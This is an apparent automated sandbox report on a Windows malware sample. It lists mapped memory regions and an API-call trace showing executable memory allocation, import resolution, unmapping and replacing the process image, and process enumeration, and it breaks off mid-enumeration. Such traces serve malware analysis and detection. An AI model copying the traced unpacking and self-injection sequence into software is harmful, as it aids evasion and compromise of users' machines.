"comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 3832 start_va = 0x470000 end_va = 0x472fff entry_point = 0x470000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 3833 start_va = 0x4e0000 end_va = 0x4e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 3834 start_va = 0x11c0000 end_va = 0x12b1fff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 3835 start_va = 0x12c0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 3836 start_va = 0x1300000 end_va = 0x13fffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 3837 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 3838 start_va = 0x1400000 end_va = 0x14eefff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 3839 start_va = 0x14f0000 end_va = 0x1657fff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 3840 start_va = 0x11c0000 end_va = 0x122afff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 3841 start_va = 0x1230000 end_va = 0x126ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 3842 start_va = 0x1270000 end_va = 0x129efff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 3843 start_va = 0x1660000 end_va = 0x175ffff entry_point = 0x0 region_type = private name = "private_0x0000000001660000" filename = "" Region: id = 3844 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 3845 start_va = 0x1400000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 3846 start_va = 0x1440000 end_va = 0x1489fff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 3847 start_va = 0x1760000 end_va = 0x185ffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 3848 start_va = 0x7fea1000 end_va = 0x7fea3fff entry_point = 0x0 region_type = private name = "private_0x000000007fea1000" filename = "" Region: id = 3849 start_va = 0xb10000 end_va = 0xb16fff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 3850 start_va = 0x1490000 end_va = 0x14cffff entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 3851 start_va = 0x1860000 end_va = 0x195ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 3852 start_va = 0x7fe9e000 end_va = 0x7fea0fff entry_point = 0x0 region_type = private name = "private_0x000000007fe9e000" filename = "" Region: id = 3853 start_va = 0x1960000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 3854 start_va = 0x19a0000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 3855 start_va = 0x1aa0000 end_va = 0x1addfff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 3856 start_va = 0x7fe9b000 end_va = 0x7fe9dfff entry_point = 0x0 region_type = private name = "private_0x000000007fe9b000" filename = "" Region: id = 3857 start_va = 0x1ae0000 end_va = 0x1b3afff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 3858 start_va = 0xb20000 end_va = 0xb2cfff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 3859 start_va = 0x1b40000 end_va = 0x1b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 3860 start_va = 0x1b80000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 3861 start_va = 0x7fe98000 end_va = 0x7fe9afff entry_point = 0x0 region_type = private name = "private_0x000000007fe98000" filename = "" Region: id = 3862 start_va = 0x1c80000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 3863 start_va = 0x1cc0000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 3864 start_va = 0x1dc0000 end_va = 0x1e0efff entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 3865 start_va = 0x7fe95000 end_va = 0x7fe97fff entry_point = 0x0 region_type = private name = "private_0x000000007fe95000" filename = "" Region: id = 3866 start_va = 0x1e10000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 3867 start_va = 0x1e50000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3868 start_va = 0x7fe92000 end_va = 0x7fe94fff entry_point = 0x0 region_type = private name = "private_0x000000007fe92000" filename = "" Region: id = 3869 start_va = 0x12a0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 3870 start_va = 0x12b0000 end_va = 0x12b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 3871 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3872 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3873 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3874 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3875 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3876 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3877 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3878 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3879 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3880 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3881 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3882 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3883 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3884 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3885 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3886 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3887 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3888 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3889 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3890 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3891 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3892 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3893 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3894 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3895 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3896 start_va = 0x12a0000 end_va = 0x12a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Region: id = 3897 start_va = 0x73a60000 end_va = 0x73aa3fff entry_point = 0x73a60000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3898 start_va = 0x12a0000 end_va = 0x12bbfff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 3899 start_va = 0x14d0000 end_va = 0x14ebfff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 3917 start_va = 0x73a40000 end_va = 0x73a56fff entry_point = 0x73a40000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3952 start_va = 0x73a20000 end_va = 0x73a32fff entry_point = 0x73a20000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3961 start_va = 0x14f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 3962 start_va = 0x1530000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 3963 start_va = 0x1f50000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 3964 start_va = 0x1f90000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 3965 start_va = 0x739e0000 end_va = 0x739effff entry_point = 0x739e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3966 start_va = 0x73a10000 end_va = 0x73a19fff entry_point = 0x73a10000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3967 start_va = 0x7fe8c000 end_va = 0x7fe8efff entry_point = 0x0 region_type = private name = "private_0x000000007fe8c000" filename = "" Region: id = 3968 start_va = 0x7fe8f000 end_va = 0x7fe91fff entry_point = 0x0 region_type = private name = "private_0x000000007fe8f000" filename = "" Region: id = 3969 start_va = 0x739f0000 end_va = 0x73a0bfff entry_point = 0x739f0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3970 start_va = 0x1630000 end_va = 0x1633fff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 3975 start_va = 0x739c0000 end_va = 0x739d3fff entry_point = 0x739c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 3976 start_va = 0x1640000 end_va = 0x165efff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 3994 start_va = 0x2090000 end_va = 0x2090fff entry_point = 0x2090000 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mpr.dll.mui") Region: id = 4034 start_va = 0x739b0000 end_va = 0x739b8fff entry_point = 0x739b0000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\SysWOW64\\drprov.dll" (normalized: "c:\\windows\\syswow64\\drprov.dll") Region: id = 4035 start_va = 0x738f0000 end_va = 0x73901fff entry_point = 0x738f0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 4036 start_va = 0x738c0000 end_va = 0x738d9fff entry_point = 0x738c0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 4072 start_va = 0x738b0000 end_va = 0x738bafff entry_point = 0x738b0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 4161 start_va = 0x738a0000 end_va = 0x738aefff entry_point = 0x738a0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 4167 start_va = 0x73890000 end_va = 0x7389efff entry_point = 0x73890000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 4169 start_va = 0x20a0000 end_va = 0x20c1fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 4170 start_va = 0x20d0000 end_va = 0x20f6fff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 4171 start_va = 0x73870000 end_va = 0x73882fff entry_point = 0x73870000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 4172 start_va = 0x73840000 end_va = 0x73867fff entry_point = 0x73840000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 4175 start_va = 0x73820000 end_va = 0x73833fff entry_point = 0x73820000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 4346 start_va = 0x2100000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 4347 start_va = 0x2200000 end_va = 0x223ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 4348 start_va = 0x2240000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 4349 start_va = 0x7fe89000 end_va = 0x7fe8bfff entry_point = 0x0 region_type = private name = "private_0x000000007fe89000" filename = "" Region: id = 4370 start_va = 0x1640000 end_va = 0x171efff entry_point = 0x1640000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 501 os_tid = 0x6d0 [0210.530] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="interface\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}", phkResult=0x45214c | out: phkResult=0x45214c*=0xa8) returned 0x0 [0210.531] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0210.531] RegQueryValueExW (in: hKey=0xa8, lpValueName="", lpReserved=0x0, lpType=0x19ff54, lpData=0x19fcf0, lpcbData=0x19ff4c*=0x12c | out: lpType=0x19ff54*=0x1, lpData="IActiveScriptParseProcedure32", lpcbData=0x19ff4c*=0x3c) returned 0x0 [0210.531] VirtualAlloc (lpAddress=0x0, dwSize=0x14800, flAllocationType=0x3000, flProtect=0x40) returned 0x480000 [0211.200] GetProcAddress (hModule=0x765f0000, lpProcName="LoadLibraryExA") returned 0x76609f60 [0211.200] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x765f0000 [0211.200] GetProcAddress (hModule=0x765f0000, lpProcName="mknjht34tfserdgfwGetProcAddress") returned 0x0 [0211.200] GetProcAddress (hModule=0x765f0000, lpProcName="GetProcAddress") returned 0x76607940 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualAlloc") returned 0x76608b70 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="LoadLibraryExA") returned 0x76609f60 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="SetFilePointer") returned 0x76616530 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="lstrlenA") returned 0x76613a30 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="lstrcatA") returned 0x7660efc0 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualProtect") returned 0x76608c50 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="UnmapViewOfFile") returned 0x766094b0 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="GetModuleHandleA") returned 0x76609640 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="WriteFile") returned 0x76616590 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="CloseHandle") returned 0x76615f20 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualFree") returned 0x76608c70 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="GetTempPathA") returned 0x76616410 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="CreateFileA") returned 0x76616170 [0211.201] GetProcAddress (hModule=0x765f0000, lpProcName="VirtualAlloc") returned 0x76608b70 [0211.201] VirtualAlloc (lpAddress=0x0, dwSize=0x13a00, flAllocationType=0x3000, flProtect=0x40) returned 0x4a0000 [0211.203] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x4c0000 [0211.204] VirtualProtect (in: lpAddress=0x1000, dwSize=0xf744, flNewProtect=0x9088158b, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0211.204] VirtualProtect (in: lpAddress=0x11000, dwSize=0xb00, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0211.204] VirtualProtect (in: lpAddress=0x12000, dwSize=0x6600, flNewProtect=0x4290880d, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0211.204] VirtualProtect (in: lpAddress=0x19000, dwSize=0x614, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0211.204] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0211.205] VirtualAlloc (lpAddress=0x400000, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0211.208] GetCurrentProcessId () returned 0x6cc [0211.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xac [0211.211] Process32FirstW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.211] GetCurrentProcessId () returned 0x6cc [0211.211] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.212] GetCurrentProcessId () returned 0x6cc [0211.212] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.212] GetCurrentProcessId () returned 0x6cc [0211.212] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.213] GetCurrentProcessId () returned 0x6cc [0211.213] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x190, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.213] GetCurrentProcessId () returned 0x6cc [0211.213] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.213] GetCurrentProcessId () returned 0x6cc [0211.213] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x188, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.214] GetCurrentProcessId () returned 0x6cc [0211.214] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x190, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.214] GetCurrentProcessId () returned 0x6cc [0211.214] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x190, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.214] GetCurrentProcessId () returned 0x6cc [0211.214] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.215] GetCurrentProcessId () returned 0x6cc [0211.215] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.215] GetCurrentProcessId () returned 0x6cc [0211.215] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0211.216] GetCurrentProcessId () returned 0x6cc [0211.216] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.216] GetCurrentProcessId () returned 0x6cc [0211.216] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.216] GetCurrentProcessId () returned 0x6cc [0211.216] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.217] GetCurrentProcessId () returned 0x6cc [0211.217] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.217] GetCurrentProcessId () returned 0x6cc [0211.217] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.218] GetCurrentProcessId () returned 0x6cc [0211.218] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x388, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.218] GetCurrentProcessId () returned 0x6cc [0211.218] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x314, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.219] GetCurrentProcessId () returned 0x6cc [0211.219] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.219] GetCurrentProcessId () returned 0x6cc [0211.219] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x404, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.219] GetCurrentProcessId () returned 0x6cc [0211.219] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.220] GetCurrentProcessId () returned 0x6cc [0211.220] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.220] GetCurrentProcessId () returned 0x6cc [0211.220] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0211.221] 